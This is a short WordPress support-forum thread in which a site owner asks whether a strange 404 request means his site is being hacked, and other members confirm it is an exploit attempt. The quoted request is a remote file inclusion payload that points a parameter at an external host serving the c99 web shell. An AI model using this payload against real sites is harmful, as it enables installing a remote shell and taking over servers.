WordPress.org

Ready to get started?Download WordPress

Forums

Is my WordPress site being hacked? (3 posts)

  1. sumeetjain
    Member
    Posted 5 years ago #

    I'm getting some users visiting non-existent pages on my site, but I think they're attempting to hack it.

    One of the 404 visits I see in my analytics is:

    http://sumeetjain.com/treasures/?_SERVERDOCUMENT_ROOT=http://xakforum.altnet.ru/tmp_upload/files/c99shell.txt?

    My site is sumeetjain.com, so that's okay. A long time ago, I had a directory called treasures, so that's okay. But a Google search for that text file at the end of the URL string returns a bunch of hacking-related websites.

    I don't understand any of the contents of the text file (I went to it directly to read into it.), so I'd really appreciate someone's assistance. I suppose my main questions are:

    1. Is this a genuine attempt at hacking?
    2. Should I be worried, or is WordPress secure?
    3. If WordPress isn't secure, what can I do to ensure it's not hacked?

    Obviously, I can't stop people from trying to hack by entering the URL. I just want to make sure they're unsuccessful.

    Thanks for your time and help.

  2. whooami
    Member
    Posted 5 years ago #

    that's an exploit attempt, yes.

  3. UseShots
    Member
    Posted 5 years ago #

    They seemed to be trying to upload a remote web shell script to your site. I guess old versions of WordPress were vulnerable to this sort of attacks.

Topic Closed

This topic has been closed to new replies.

About this Topic

Tags